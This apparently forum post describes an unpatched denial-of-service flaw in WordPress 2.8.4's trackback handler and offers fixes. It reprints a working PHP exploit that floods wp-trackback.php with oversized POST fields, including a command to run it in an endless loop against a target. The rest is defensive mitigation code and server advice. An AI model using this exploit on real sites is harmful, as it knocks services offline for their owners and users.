There's currently an exploit out for 2.8.4 which isn't patched, that will allow someone to exhaust your site using a DoS against certain file(s).
Here is the POC (proof of concept):
Code:
<?php
/*
 * wordpress Resource exhaustion Exploit
 * http://rooibo.wordpress.com/
 * [email protected] contacted and get a response,
 * but no solution available.
 *
 * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org <[email protected]>
 *
 * exploiting:
 * you must install php-cli (command line interface)
 * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
 *
 */
if(count($argv) < 2) die("You need to specify a url to attack\n");
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2) die("The url should have http:// in front of it, and should be complete.\n");
$path = (count($data)==2)?"":$data['path'];
$path = trim($path,'/').'/wp-trackback.php';
if($path{0} != '/') $path = '/'.$path;
$b = "";
$b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");
$str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol';
for($n = 0; $n <= 5; $n++){
    $fp = @fsockopen($data['host'],80);
    if(!$fp) die("unable to connect to: ".$data['host']."\n");
    $pid[$n] = pcntl_fork();
    if(!$pid[$n]){
        fputs($fp, "POST $path HTTP/1.1\r\n");
        fputs($fp, "Host: ".$data['host']."\r\n");
        fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
        fputs($fp, "Content-length: ".strlen($str)."\r\n");
        fputs($fp, "Connection: close\r\n\r\n");
        fputs($fp, $str."\r\n\r\n");
        echo "hit!\n";
    }
}
?>
And here is the *temp* fix until they patch it. Add this to your theme's functions.php file:
Code:
<?php
// WP Trackback Temp Fix
function ft_stop_trackback_dos_attacks(){
    global $pagenow;
    // Only act on direct requests to wp-trackback.php.
    if ( 'wp-trackback.php' == $pagenow ){
        // DoS attack fix: the exploit posts a charset value of ~140 KB, so
        // refuse any charset longer than a real charset name could be.
        if ( isset($_POST['charset']) ){
            $charset = $_POST['charset'];
            if ( strlen($charset) > 50 ) { die; }
        }
    }
}
// 'init' fires while wp-trackback.php loads wp-load.php, before the trackback is processed.
add_action('init','ft_stop_trackback_dos_attacks');
?>
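As an added example (not the original poster's fix and not WordPress's own code), here is the same idea moved into a must-use plugin so it survives a theme switch, extended to bound the other trackback fields the POC inflates, and made to log each rejection so the attempts show up in the PHP error log. The plugin name, the `tbg_` function names and the field limits are assumptions chosen for illustration; `$pagenow`, `status_header()`, `add_action()` and the `init` hook are WordPress's own, and the XML envelope is the standard trackback error response.

```php
<?php
/*
Plugin Name: Trackback Size Guard (added example, not the original post's fix)
Description: Rejects oversized trackback POST fields before WordPress processes them and logs the attempt.
*/

// Per-field limits (assumed values). A real charset name is a few characters;
// legitimate trackback titles/excerpts are at most a few hundred bytes.
define( 'TBG_MAX_CHARSET_LEN', 50 );
define( 'TBG_MAX_FIELD_LEN',   4096 );

// Returns array( field => length ) for every field that exceeds its limit.
function tbg_oversized_fields( array $post ) {
    $limits = array(
        'charset'   => TBG_MAX_CHARSET_LEN,
        'title'     => TBG_MAX_FIELD_LEN,
        'excerpt'   => TBG_MAX_FIELD_LEN,
        'blog_name' => TBG_MAX_FIELD_LEN,
        'url'       => TBG_MAX_FIELD_LEN,
    );
    $bad = array();
    foreach ( $limits as $field => $max ) {
        if ( isset( $post[ $field ] ) && strlen( (string) $post[ $field ] ) > $max ) {
            $bad[ $field ] = strlen( (string) $post[ $field ] );
        }
    }
    return $bad;
}

function tbg_guard_trackback() {
    global $pagenow;
    // Same gate as the theme fix: only direct POSTs to wp-trackback.php.
    if ( 'wp-trackback.php' !== $pagenow ) {
        return;
    }
    if ( ! isset( $_SERVER['REQUEST_METHOD'] ) || 'POST' !== $_SERVER['REQUEST_METHOD'] ) {
        return;
    }
    $bad = tbg_oversized_fields( $_POST );
    if ( empty( $bad ) ) {
        return;
    }
    // Log enough to spot a campaign (source, which fields, how large) without
    // storing the attacker-controlled payload itself.
    $summary = array();
    foreach ( $bad as $field => $len ) {
        $summary[] = $field . '=' . $len . 'B';
    }
    $src = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown';
    error_log( sprintf( 'trackback rejected from %s: oversized field(s) %s', $src, implode( ', ', $summary ) ) );

    // Answer with a proper trackback error instead of a bare die so that
    // well-behaved clients understand the refusal; 413 keeps the rejection visible in access logs.
    status_header( 413 );
    header( 'Content-Type: text/xml; charset=utf-8' );
    echo '<?xml version="1.0" encoding="utf-8"?>'
       . '<response><error>1</error><message>Trackback rejected: field too large</message></response>';
    exit;
}
// 'init' runs while wp-trackback.php is loading wp-load.php, i.e. before the trackback is handled.
add_action( 'init', 'tbg_guard_trackback' );
```

Drop the file into wp-content/mu-plugins/ and it is active with no settings and cannot be disabled from the admin UI. The request still has to be received and parsed by PHP before this code runs, so a complementary control at the web server (for example Apache's `LimitRequestBody` inside a `<Files "wp-trackback.php">` block, sized to the same few-KB budget) stops the oversized bodies earlier; the in-WordPress check then mainly serves as the logging and last line of defense.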